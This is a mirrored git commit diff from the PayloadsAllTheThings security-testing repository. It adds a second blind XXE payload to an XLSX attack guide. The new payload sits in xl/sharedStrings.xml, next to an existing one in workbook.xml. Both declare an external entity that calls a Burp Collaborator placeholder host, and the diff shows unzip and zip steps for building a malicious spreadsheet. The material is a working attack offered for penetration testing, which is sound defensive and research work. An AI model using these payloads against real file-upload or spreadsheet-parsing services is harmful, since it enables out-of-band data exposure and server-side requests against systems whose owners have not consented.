mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 23:02:46 +00:00
Merge pull request #302 from noraj/patch-1
add another example of XXE in XLSX
This commit is contained in:
commit
2f83ee56f4
1 changed files with 12 additions and 3 deletions
|
@ -462,7 +462,7 @@ GIF (experimental)
|
||||||
|
|
||||||
Extract the excel file.
|
Extract the excel file.
|
||||||
|
|
||||||
```powershell
|
```
|
||||||
$ mkdir XXE && cd XXE
|
$ mkdir XXE && cd XXE
|
||||||
$ unzip ../XXE.xlsx
|
$ unzip ../XXE.xlsx
|
||||||
Archive: ../XXE.xlsx
|
Archive: ../XXE.xlsx
|
||||||
|
@ -479,16 +479,24 @@ Archive: ../XXE.xlsx
|
||||||
|
|
||||||
Add your blind XXE payload inside `xl/workbook.xml`.
|
Add your blind XXE payload inside `xl/workbook.xml`.
|
||||||
|
|
||||||
```powershell
|
```xml
|
||||||
<xml...>
|
<xml...>
|
||||||
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
|
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
|
||||||
<x>&xxe;</x>
|
<x>&xxe;</x>
|
||||||
<workbook...>
|
<workbook...>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Alternativly, add your payload in `xl/sharedStrings.xml`:
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||||
|
<!DOCTYPE foo [ <!ELEMENT t ANY > <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
|
||||||
|
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&xxe;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
|
||||||
|
```
|
||||||
|
|
||||||
Rebuild the Excel file.
|
Rebuild the Excel file.
|
||||||
|
|
||||||
```powershell
|
```
|
||||||
$ zip -r ../poc.xlsx *
|
$ zip -r ../poc.xlsx *
|
||||||
updating: [Content_Types].xml (deflated 71%)
|
updating: [Content_Types].xml (deflated 71%)
|
||||||
updating: _rels/ (stored 0%)
|
updating: _rels/ (stored 0%)
|
||||||
|
@ -539,6 +547,7 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
|
||||||
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
||||||
* [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau
|
* [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau
|
||||||
* [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
* [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
||||||
|
* [excel-reader-xlsx #10](https://github.com/jmcnamara/excel-reader-xlsx/issues/10)
|
||||||
* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
|
* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
|
||||||
* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
|
* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
|
||||||
* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
|
* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
|
||||||
|
|
Loading…
Reference in a new issue